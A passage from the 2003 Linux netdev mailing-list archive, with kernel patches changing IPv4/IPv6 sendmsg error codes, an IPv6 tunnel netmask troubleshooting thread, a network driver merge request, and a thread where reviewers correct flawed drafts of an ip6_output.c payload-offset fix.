(sk->sk_state != TCP_ESTABLISHED) - return -ENOTCONN; + return -EDESTADDRREQ; daddr = inet->daddr; dport = inet->dport; /* Open fast path for connected socket. Index: net/ipv6/raw.c =================================================================== RCS file: /cvs/tgr/linux-25/net/ipv6/raw.c,v retrieving revision 1.1.1.2 diff -u -r1.1.1.2 raw.c --- net/ipv6/raw.c 10 Jul 2003 22:58:50 -0000 1.1.1.2 +++ net/ipv6/raw.c 10 Jul 2003 23:18:04 -0000 @@ -602,7 +602,7 @@ fl.oif = sin6->sin6_scope_id; } else { if (sk->sk_state != TCP_ESTABLISHED) - return(-EINVAL); + return -EDESTADDRREQ; proto = inet->num; daddr = &np->daddr; Index: net/ipv6/udp.c =================================================================== RCS file: /cvs/tgr/linux-25/net/ipv6/udp.c,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 udp.c --- net/ipv6/udp.c 9 Jul 2003 18:42:35 -0000 1.1.1.1 +++ net/ipv6/udp.c 10 Jul 2003 23:18:04 -0000 @@ -862,7 +862,7 @@ fl.oif = sin6->sin6_scope_id; } else { if (sk->sk_state != TCP_ESTABLISHED) - return -ENOTCONN; + return -EDESTADDRREQ; up->dport = inet->dport; daddr = &np->daddr; From hogarth@theirongiant.lochness.weebeastie.net Thu Jul 10 16:39:59 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 16:40:03 -0700 (PDT) Received: from nessie.weebeastie.net (nessie.weebeastie.net [61.8.7.205]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6ANdt2x026607 for ; Thu, 10 Jul 2003 16:39:57 -0700 Received: from theirongiant.lochness.weebeastie.net (theirongiant.lochness.weebeastie.net [10.1.1.2]) by nessie.weebeastie.net (8.12.3/8.12.3/Debian-6.4) with ESMTP id h6ANdOg6002434 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=FAIL); Fri, 11 Jul 2003 09:39:24 +1000 Received: from theirongiant.lochness.weebeastie.net (localhost [127.0.0.1]) by theirongiant.lochness.weebeastie.net (8.12.3/8.12.3/Debian-6.4) with ESMTP id h6ANdW4u017705 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Fri, 11 Jul 2003 09:39:32 +1000 Received: (from hogarth@localhost) by theirongiant.lochness.weebeastie.net (8.12.3/8.12.3/Debian-6.4) id h6ANdV23017704; Fri, 11 Jul 2003 09:39:31 +1000 Date: Fri, 11 Jul 2003 09:39:31 +1000 From: CaT To: Mika Liljeberg Cc: yoshfuji@linux-ipv6.org, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, pekkas@netcore.fi Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked Message-ID: <20030710233931.GG1722@zip.com.au> References: <20030710154302.GE1722@zip.com.au> <1057854432.3588.2.camel@hades> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <1057854432.3588.2.camel@hades> User-Agent: Mutt/1.3.28i Organisation: Furball Inc. X-archive-position: 3919 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cat@zip.com.au Precedence: bulk X-list: netdev On Thu, Jul 10, 2003 at 07:27:13PM +0300, Mika Liljeberg wrote: > On Thu, 2003-07-10 at 18:43, CaT wrote: > > ip tunnel add sit1 mode sit remote 138.25.6.14 > > ip link set sit1 up > > ip addr add 3ffe:8001:000c:ffff::37/127 dev sit1 > > ip route add ::/0 via 3ffe:8001:000c:ffff::36 > > RTNETLINK answers: Invalid argument > > Try this: > > ip route add ::/0 dev sit1 That didn't complain but pings to the ext gw were broken. Noticed the route contained: 3ffe:8001:c:ffff::36/127 via :: dev sit1 proto kernel metric 256 mtu 1480 adv mss 1420 And having remembered /127 being mentioned as bad I changed the interface config to a netmask of /64. Dropped it and brought it up and it all works. There's something fundamental about ipv6 netmasks that I just don't understand... -- "How can I not love the Americans? They helped me with a flat tire the other day," he said. - http://www.toledoblade.com/apps/pbcs.dll/artikkel?SearchID=73139162287496&Avis=TO&Dato=20030624&Kategori=NEWS28&Lopenr=106240111&Ref=AR From tgr@reeler.org Thu Jul 10 16:45:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 16:45:22 -0700 (PDT) Received: from rei.rakuen (dclient217-162-65-211.hispeed.ch [217.162.65.211]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6ANjH2x026936 for ; Thu, 10 Jul 2003 16:45:18 -0700 Received: by reeler.org id 19al5l-00009D-00 ; Fri, 11 Jul 2003 01:44:49 +0200 Date: Fri, 11 Jul 2003 01:44:49 +0200 From: Thomas Graf To: davem@redhat.com, jmorris@intercode.com.au, yoshfuji@linux-ipv6.org Cc: netdev@oss.sgi.com, tgraf@suug.ch Subject: [PATCH] IPV6: fix data offset calculation when pushing frag options {dst1opts|auth} Message-ID: <20030710234449.GB30577@rei.rakuen> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline X-Encryption: "Encrypted with ROT13 using key 42" X-archive-position: 3920 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: tgraf@suug.ch Precedence: bulk X-list: netdev Hello ip6_append_data: The offset in the datagram where the payload gets copied to (transhdrlen) is not calculated correctly: the size of frag opts {dst1opt|auth} is not taken into account. This lead to overwritten payload by frag opts. yoshfuji agreed on this. patch is against 2.5.75 -- thomas Index: net/ipv6/ip6_output.c =================================================================== RCS file: /cvs/tgr/linux-25/net/ipv6/ip6_output.c,v retrieving revision 1.1.1.2 diff -u -r1.1.1.2 ip6_output.c --- net/ipv6/ip6_output.c 10 Jul 2003 22:58:50 -0000 1.1.1.2 +++ net/ipv6/ip6_output.c 10 Jul 2003 23:36:48 -0000 @@ -1247,11 +1247,9 @@ inet->cork.length = 0; inet->sndmsg_page = NULL; inet->sndmsg_off = 0; - if ((exthdrlen = rt->u.dst.header_len) != 0) { - length += exthdrlen; - transhdrlen += exthdrlen; - } - exthdrlen += opt ? opt->opt_flen : 0; + exthdrlen = rt->u.dst.header_len + opt ? opt->opt_flen : 0; + length += exthdrlen; + transhdrlen += exthdrlen; } else { rt = np->cork.rt; if (inet->cork.flags & IPCORK_OPT) From garzik@gtf.org Thu Jul 10 16:55:25 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 16:55:31 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6ANtO2x027285 for ; Thu, 10 Jul 2003 16:55:24 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id 8FD586662; Thu, 10 Jul 2003 19:55:18 -0400 (EDT) Date: Thu, 10 Jul 2003 19:55:18 -0400 From: Jeff Garzik To: torvalds@osdl.org, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: [BK PATCHES] more net driver merges Message-ID: <20030710235518.GA16507@gtf.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-archive-position: 3921 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Linus, please do a bk pull bk://kernel.bkbits.net/jgarzik/net-drivers-2.5 Others may download ftp://ftp.kernel.org/pub/linux/kernel/people/jgarzik/patchkits/2.5/2.5.75-netdrvr1.patch.bz2 This will update the following files: drivers/net/appletalk/cops.c | 5 - drivers/net/appletalk/ltpc.c | 5 - drivers/net/declance.c | 2 drivers/net/dgrs.c | 27 +++---- drivers/net/e100/e100_main.c | 32 +++----- drivers/net/e100/e100_phy.c | 2 drivers/net/hamradio/mkiss.c | 141 +++++++-------------------------------- drivers/net/hamradio/mkiss.h | 2 drivers/net/pcmcia/3c574_cs.c | 2 drivers/net/pcmcia/3c589_cs.c | 2 drivers/net/pcmcia/smc91c92_cs.c | 2 drivers/net/plip.c | 96 ++++++++++++-------------- drivers/net/sb1250-mac.c | 2 drivers/net/sk_mca.c | 2 drivers/net/sundance.c | 10 ++ drivers/net/tg3.c | 5 - drivers/net/tokenring/3c359.c | 2 drivers/net/tokenring/proteon.c | 1 drivers/net/tokenring/skisa.c | 1 drivers/net/via-rhine.c | 2 drivers/net/wireless/atmel_cs.c | 11 +-- drivers/net/wireless/wavelan.c | 6 + 22 files changed, 131 insertions(+), 229 deletions(-) through these ChangeSets: (03/07/10 1.1400) [netdrvr atmel_cs] kill compiler warning (jumping to "empty" label) (03/07/10 1.1399) [netdrvr wavelan] remove check_region usage (03/07/10 1.1398) [netdrvr] fix compiler warnings in 3c359, proteon, skisa tokenring drivers. (03/07/10 1.1397) [netdrvr tg3] more ULL suffixes to make gcc 3.3 happy (03/07/10 1.1396) [netdrvr dgrs] convert to using alloc_etherdev (03/07/10 1.1395) [PATCH] net/pcmcia fix fast_poll timers (HZ > 100) i think we want fast_poll to behave the same with HZ=100 and HZ=1000 (03/07/10 1.1394) [PATCH] more net driver timer fixes following patch fixes some bogus additions to jiffies (w/o HZ beeing involved) - appletalk/cops.c - appletalk/ltpc.c - declance.c - sb1250-mac.c - sk_mca.c - via-rhine.c against 2.5.73-bk (03/07/10 1.1393) [PATCH] mkiss Below patch cleans the mkiss driver. After the previous cleanup in 2.4.0-prerelease various code had become unreachable because nothing was ever setting MKISS_DRIVER_MAGIC. This fixes fixes an oops - the mkiss pointer was potencially NULL. And it also removes the MOD_{INC,DEC}_USE_COUNT calls. Alan, lemme know if you want me to cook a 2.4 patch also. Patch from Jeroen Vreeken PE1RXQ. Ralf (03/07/10 1.1392) [PATCH] convert plip to alloc_netdev This converts the parallel network driver to use alloc_netdev instead of doing it's own allocation. Tested (load/unload) on 2.5.74 (03/07/10 1.1391) [e100] misc * Allow changing Wake On LAN when EEPROM disabled * Change Log updated * Version changed (03/07/10 1.1390) [e100] cu_start: timeout waiting for cu * Bug fix: 82557 (with National PHY) timeout during init [Adam Kropelin] akropel1@rochester.rr.com (03/07/10 1.1389) [netdrvr sundance] increase eeprom read timeout From mika.liljeberg@welho.com Thu Jul 10 17:04:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:04:20 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B04E2x027700 for ; Thu, 10 Jul 2003 17:04:15 -0700 Received: from hades.pp.htv.fi (localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6B04UZj008015; Fri, 11 Jul 2003 03:04:30 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6B04TQv008014; Fri, 11 Jul 2003 03:04:29 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: Mika Liljeberg To: CaT Cc: yoshfuji@linux-ipv6.org, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, pekkas@netcore.fi In-Reply-To: <20030710233931.GG1722@zip.com.au> References: <20030710154302.GE1722@zip.com.au> <1057854432.3588.2.camel@hades> <20030710233931.GG1722@zip.com.au> Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1057881869.3588.10.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 11 Jul 2003 03:04:29 +0300 X-archive-position: 3922 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev On Fri, 2003-07-11 at 02:39, CaT wrote: > And having remembered /127 being mentioned as bad I changed the > interface config to a netmask of /64. Dropped it and brought it > up and it all works. > > There's something fundamental about ipv6 netmasks that I just don't > understand... Well, the thing is that prefix:: is a special anycast address that identifies a router on the link prefix::/n, where n is the prefix length. You had configured a 127-bit link prefix, meaning that you had only one valid unicast address (last bit == 1) in addition to the router anycast address (last bit == 0). Normally, IPv6 networks are supposed to use 64-bit on-link prefixes but the implementation can be written in such a way that other prefix lengths can be configured. Setting your tunnel prefix to /64 is certainly the right thing to do. MikaL From yoshfuji@linux-ipv6.org Thu Jul 10 17:16:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:17:04 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0Gm2x028163 for ; Thu, 10 Jul 2003 17:16:53 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6B0IEBo003849; Fri, 11 Jul 2003 09:18:14 +0900 Date: Fri, 11 Jul 2003 09:18:14 +0900 (JST) Message-Id: <20030711.091814.128467921.yoshfuji@linux-ipv6.org> To: tgraf@suug.ch, davem@redhat.com, jmorris@intercode.com.au Cc: netdev@oss.sgi.com Subject: Re: [PATCH] IPV6: fix data offset calculation when pushing frag options {dst1opts|auth} From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030710234449.GB30577@rei.rakuen> References: <20030710234449.GB30577@rei.rakuen> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3923 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030710234449.GB30577@rei.rakuen> (at Fri, 11 Jul 2003 01:44:49 +0200), Thomas Graf says: > yoshfuji agreed on this. I agreed, but > - exthdrlen += opt ? opt->opt_flen : 0; > + exthdrlen = rt->u.dst.header_len + opt ? opt->opt_flen : 0; Well, sorry, this was wrong. D: fix offset of payload with extension header. D: based on patch from Thomas Graf Index: linux-2.5/net/ipv6/ip6_output.c =================================================================== RCS file: /home/cvs/linux-2.5/net/ipv6/ip6_output.c,v retrieving revision 1.33 diff -u -r1.33 ip6_output.c --- linux-2.5/net/ipv6/ip6_output.c 9 Jul 2003 05:55:17 -0000 1.33 +++ linux-2.5/net/ipv6/ip6_output.c 10 Jul 2003 22:50:33 -0000 @@ -1247,11 +1247,9 @@ inet->cork.length = 0; inet->sndmsg_page = NULL; inet->sndmsg_off = 0; - if ((exthdrlen = rt->u.dst.header_len) != 0) { - length += exthdrlen; - transhdrlen += exthdrlen; - } - exthdrlen += opt ? opt->opt_flen : 0; + exthdrlen += rt->u.dst.header_len + (opt ? opt->opt_flen : 0); + length += exthdrlen; + transhdrlen += exthdrlen; } else { rt = np->cork.rt; if (inet->cork.flags & IPCORK_OPT) --yoshfuji From yoshfuji@linux-ipv6.org Thu Jul 10 17:23:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:23:19 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0N72x028530 for ; Thu, 10 Jul 2003 17:23:08 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6B0OZBo003995; Fri, 11 Jul 2003 09:24:35 +0900 Date: Fri, 11 Jul 2003 09:24:35 +0900 (JST) Message-Id: <20030711.092435.64560380.yoshfuji@linux-ipv6.org> To: tgraf@suug.ch, davem@redhat.com, jmorris@intercode.com.au Cc: netdev@oss.sgi.com Subject: Re: [PATCH] IPV6: fix data offset calculation when pushing frag options {dst1opts|auth} From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030711.091814.128467921.yoshfuji@linux-ipv6.org> References: <20030710234449.GB30577@rei.rakuen> <20030711.091814.128467921.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=iso-2022-jp Content-Transfer-Encoding: 7bit X-archive-position: 3924 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030711.091814.128467921.yoshfuji@linux-ipv6.org> (at Fri, 11 Jul 2003 09:18:14 +0900 (JST)), YOSHIFUJI Hideaki / $B5HF#1QL@(B says: > D: fix offset of payload with extension header. > D: based on patch from Thomas Graf Oops, thas wrong again; please use this instead... Index: linux-2.5/net/ipv6/ip6_output.c =================================================================== RCS file: /home/cvs/linux-2.5/net/ipv6/ip6_output.c,v retrieving revision 1.33 diff -u -r1.33 ip6_output.c --- linux-2.5/net/ipv6/ip6_output.c 9 Jul 2003 05:55:17 -0000 1.33 +++ linux-2.5/net/ipv6/ip6_output.c 10 Jul 2003 23:02:56 -0000 @@ -1247,11 +1247,9 @@ inet->cork.length = 0; inet->sndmsg_page = NULL; inet->sndmsg_off = 0; - if ((exthdrlen = rt->u.dst.header_len) != 0) { - length += exthdrlen; - transhdrlen += exthdrlen; - } - exthdrlen += opt ? opt->opt_flen : 0; + exthdrlen = rt->u.dst.header_len + (opt ? opt->opt_flen : 0); + length += exthdrlen; + transhdrlen += exthdrlen; } else { rt = np->cork.rt; if (inet->cork.flags & IPCORK_OPT) -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From davem@redhat.com Thu Jul 10 17:27:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:27:29 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0RK2x028873 for ; Thu, 10 Jul 2003 17:27:21 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id RAA28070; Thu, 10 Jul 2003 17:18:33 -0700 Date: Thu, 10 Jul 2003 17:18:33 -0700 (PDT) Message-Id: <20030710.171833.34738924.davem@redhat.com> To: yoshfuji@linux-ipv6.org Cc: tgraf@suug.ch, jmorris@intercode.com.au, netdev@oss.sgi.com Subject: Re: [PATCH] IPV6: fix data offset calculation when pushing frag options {dst1opts|auth} From: "David S. Miller" In-Reply-To: <20030711.092435.64560380.yoshfuji@linux-ipv6.org> References: <20030710234449.GB30577@rei.rakuen> <20030711.091814.128467921.yoshfuji@linux-ipv6.org> <20030711.092435.64560380.yoshfuji@linux-ipv6.org> X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=iso-2022-jp Content-Transfer-Encoding: 7bit X-archive-position: 3925 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: YOSHIFUJI Hideaki / $B5HF#1QL@(B Date: Fri, 11 Jul 2003 09:24:35 +0900 (JST) In article <20030711.091814.128467921.yoshfuji@linux-ipv6.org> (at Fri, 11 Jul 2003 09:18:14 +0900 (JST)), YOSHIFUJI Hideaki / $B5HF#1QL@(B says: > D: fix offset of payload with extension header. > D: based on patch from Thomas Graf Oops, thas wrong again; please use this instead... Applied, thanks. From tgr@reeler.org Thu Jul 10 17:27:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:27:40 -0700 (PDT) Received: from rei.rakuen (dclient217-162-65-211.hispeed.ch [217.162.65.211]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0RX2x028879 for ; Thu, 10 Jul 2003 17:27:34 -0700 Received: by reeler.org id 19alkn-0000KQ-00 ; Fri, 11 Jul 2003 02:27:13 +0200 Date: Fri, 11 Jul 2003 02:27:13 +0200 From: Thomas Graf To: "YOSHIFUJI Hideaki / ?$B5HF#1QL@" Cc: davem@redhat.com, jmorris@intercode.com.au, netdev@oss.sgi.com Subject: Re: [PATCH] IPV6: fix data offset calculation when pushing frag options {dst1opts|auth} Message-ID: <20030711002713.GC30577@rei.rakuen> References: <20030710234449.GB30577@rei.rakuen> <20030711.091814.128467921.yoshfuji@linux-ipv6.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030711.091814.128467921.yoshfuji@linux-ipv6.org> X-Encryption: "Encrypted with ROT13 using key 42" X-archive-position: 3926 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: tgraf@suug.ch Precedence: bulk X-list: netdev * yoshfuji@linux-ipv6.org wrote: > + exthdrlen += rt->u.dst.header_len + (opt ? opt->opt_flen : 0); exthdrlen is uninitialized. New patch: Index: net/ipv6/ip6_output.c =================================================================== RCS file: /cvs/tgr/linux-25/net/ipv6/ip6_output.c,v retrieving revision 1.1.1.2 diff -u -r1.1.1.2 ip6_output.c --- net/ipv6/ip6_output.c 10 Jul 2003 22:58:50 -0000 1.1.1.2 +++ net/ipv6/ip6_output.c 10 Jul 2003 23:36:48 -0000 @@ -1247,11 +1247,9 @@ inet->cork.length = 0; inet->sndmsg_page = NULL; inet->sndmsg_off = 0; - if ((exthdrlen = rt->u.dst.header_len) != 0) { - length += exthdrlen; - transhdrlen += exthdrlen; - } - exthdrlen += opt ? opt->opt_flen : 0; + exthdrlen = rt->u.dst.header_len + (opt ? opt->opt_flen : 0); + length += exthdrlen; + transhdrlen += exthdrlen; } else { rt = np->cork.rt; if (inet->cork.flags & IPCORK_OPT) From davem@redhat.com Thu Jul 10 17:31:09 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:31:15 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0V82x029519 for ; Thu, 10 Jul 2003 17:31:09 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id RAA28108; Thu, 10 Jul 2003 17:22:33 -0700 Date: Thu, 10 Jul 2003 17:22:32 -0700 (PDT) Message-Id: <20030710.172232.02275886.davem@redhat.com> To: tgraf@suug.ch Cc: yoshfuji@linux-ipv6.org, jmorris@intercode.com.au, netdev@oss.sgi.com Subject: Re: [PATCH] IPV6: fix data offset calculation when pushing frag options {dst1opts|auth} From: "David S. Miller" In-Reply-To: <20030711002713.GC30577@rei.rakuen> References: <20030710234449.GB30577@rei.rakuen> <20030711.091814.128467921.yoshfuji@linux-ipv6.org> <20030711002713.GC30577@rei.rakuen> X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3927 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Thomas Graf Date: Fri, 11 Jul 2003 02:27:13 +0200 * yoshfuji@linux-ipv6.org wrote: > + exthdrlen += rt->u.dst.header_len + (opt ? opt->opt_flen : 0); exthdrlen is uninitialized. Yoshfuji already fixed this, see his followup. From tgr@reeler.org Thu Jul 10 17:33:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:33:17 -0700 (PDT) Received: from rei.rakuen (dclient217-162-65-211.hispeed.ch [217.162.65.211]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0XC2x029832 for ; Thu, 10 Jul 2003 17:33:13 -0700 Received: by reeler.org id 19alqG-0000Lz-00 ; Fri, 11 Jul 2003 02:32:52 +0200 Date: Fri, 11 Jul 2003 02:32:52 +0200 From: Thomas Graf To: "David S. Miller" Cc: yoshfuji@linux-ipv6.org, jmorris@intercode.com.au, netdev@oss.sgi.com Subject: Re: [PATCH] IPV6: fix data offset calculation when pushing frag options {dst1opts|auth} Message-ID: <20030711003252.GD30577@rei.rakuen> References: <20030710234449.GB30577@rei.rakuen> <20030711.091814.128467921.yoshfuji@linux-ipv6.org> <20030711002713.GC30577@rei.rakuen> <20030710.172232.02275886.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030710.172232.02275886.davem@redhat.com> X-Encryption: "Encrypted with ROT13 using key 42" X-archive-position: 3928 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: tgraf@suug.ch Precedence: bulk X-list: netdev * davem@redhat.com wrote: > From: Thomas Graf > Date: Fri, 11 Jul 2003 02:27:13 +0200 > > * yoshfuji@linux-ipv6.org wrote: > > + exthdrlen += rt->u.dst.header_len + (opt ? opt->opt_flen : 0); > > exthdrlen is uninitialized. > > Yoshfuji already fixed this, see his followup. Yep, received that mail while writing the last one ;) -- thomas From yoshfuji@linux-ipv6.org Thu Jul 10 17:34:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:34:19 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0YE2x030081 for ; Thu, 10 Jul 2003 17:34:15 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6B0ZkBo008694; Fri, 11 Jul 2003 09:35:46 +0900 Date: Fri, 11 Jul 2003 09:35:46 +0900 (JST) Message-Id: <20030711.093546.12708723.yoshfuji@linux-ipv6.org> To: davem@redhat.com, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org CC: tgraf@suug.ch Subject: Re: [PATCH] make sendmsg return EDESTADDRREQ if socket is not connected and daddr was not specified From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030710233223.GA30577@rei.rakuen> References: <20030710233223.GA30577@rei.rakuen> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3929 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030710233223.GA30577@rei.rakuen> (at Fri, 11 Jul 2003 01:32:23 +0200), Thomas Graf says: > [EDESTADDRREQ] > The socket is not connection-mode and does not have its peer > address set, and no destination address was specified. > > fixes sendmsg in ipv{4,6}/{raw,udp} I aggeed on this, however we may want to do for whole tree at same time. How do you think, folks? --yoshfuji From yoshfuji@linux-ipv6.org Thu Jul 10 17:35:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:35:34 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0ZS2x030332 for ; Thu, 10 Jul 2003 17:35:29 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id 